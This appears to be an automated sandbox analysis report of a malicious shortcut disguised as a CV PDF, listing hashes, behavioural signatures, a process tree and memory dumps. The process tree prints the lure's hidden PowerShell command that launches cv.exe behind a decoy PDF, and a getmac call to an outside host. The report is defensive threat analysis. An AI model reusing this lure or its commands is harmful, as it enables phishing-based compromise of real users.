Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 11:55
Behavioral task
behavioral1
Sample
CV_zheregelya.pdf
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
CV_zheregelya.pdf
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
CV_zheregelya.pdf.lnk
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
CV_zheregelya.pdf.lnk
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
cv.exe
Resource
win7-20240705-en
Behavioral task
behavioral6
Sample
cv.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral7
Sample
version.dll
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
version.dll
Resource
win10v2004-20240708-en
General
-
Target
CV_zheregelya.pdf.lnk
-
Size
1KB
-
MD5
0a533419e2601004585b16d46d3d212f
-
SHA1
b247eb947591cbd5569b64b6dcbbe32bc0d1f859
-
SHA256
232a0ab1ffe72a5e12aa881c2b2b5e04af662dd84d594f9ad0e3c26f1abe0337
-
SHA512
6b28c70f357cbd357cb81a12eccb66e2c54ff5e4f9f6026e9457f8361ef208e256f8fa784ebdb7167f21b20602510b87bed1c67449c179676fc869a20a6e67bc
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 2588 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2356 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
AcroRd32.exepid process 2588 AcroRd32.exe 2588 AcroRd32.exe 2588 AcroRd32.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exepowershell.execv.exedescription pid process target process PID 2620 wrote to memory of 2356 2620 cmd.exe powershell.exe PID 2620 wrote to memory of 2356 2620 cmd.exe powershell.exe PID 2620 wrote to memory of 2356 2620 cmd.exe powershell.exe PID 2356 wrote to memory of 2676 2356 powershell.exe cv.exe PID 2356 wrote to memory of 2676 2356 powershell.exe cv.exe PID 2356 wrote to memory of 2676 2356 powershell.exe cv.exe PID 2356 wrote to memory of 2588 2356 powershell.exe AcroRd32.exe PID 2356 wrote to memory of 2588 2356 powershell.exe AcroRd32.exe PID 2356 wrote to memory of 2588 2356 powershell.exe AcroRd32.exe PID 2356 wrote to memory of 2588 2356 powershell.exe AcroRd32.exe PID 2676 wrote to memory of 2896 2676 cv.exe getmac.exe PID 2676 wrote to memory of 2896 2676 cv.exe getmac.exe PID 2676 wrote to memory of 2896 2676 cv.exe getmac.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CV_zheregelya.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noprofile -w 1 $l=gl;cd $l;start .\cv.exe;start .\CV_zheregelya.pdf2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cv.exe"C:\Users\Admin\AppData\Local\Temp\cv.exe"3⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\getmac.exegetmac /s service.1c-report.com /fo table /nh /v4⤵
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\CV_zheregelya.pdf"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEventsFilesize
3KB
MD53fb06afd7d5b54a437d72d1b8a28f8ba
SHA1d7ead4c7b70b777084f033275b57a92dd020a09f
SHA2561cd293a0af93bc7ce7f011590cf8d43e667f556845a877becd719e09e62432cf
SHA51242ae8dd0d79fb4802501ca46351c1f9b33890b2c4bc6c010399cb6a0b81a71ea780cdda63a7c857374ebb89b9591000a92f15170f6dc5e33da3b1d097fa32ff2
-
memory/2356-38-0x000007FEF649E000-0x000007FEF649F000-memory.dmpFilesize
4KB
-
memory/2356-39-0x000000001B5A0000-0x000000001B882000-memory.dmpFilesize
2.9MB
-
memory/2356-40-0x0000000001E00000-0x0000000001E08000-memory.dmpFilesize
32KB
-
memory/2356-41-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmpFilesize
9.6MB
-
memory/2356-43-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmpFilesize
9.6MB
-
memory/2356-42-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmpFilesize
9.6MB
-
memory/2356-45-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmpFilesize
9.6MB
-
memory/2356-44-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmpFilesize
9.6MB
-
memory/2356-46-0x000007FEF61E0000-0x000007FEF6B7D000-memory.dmpFilesize
9.6MB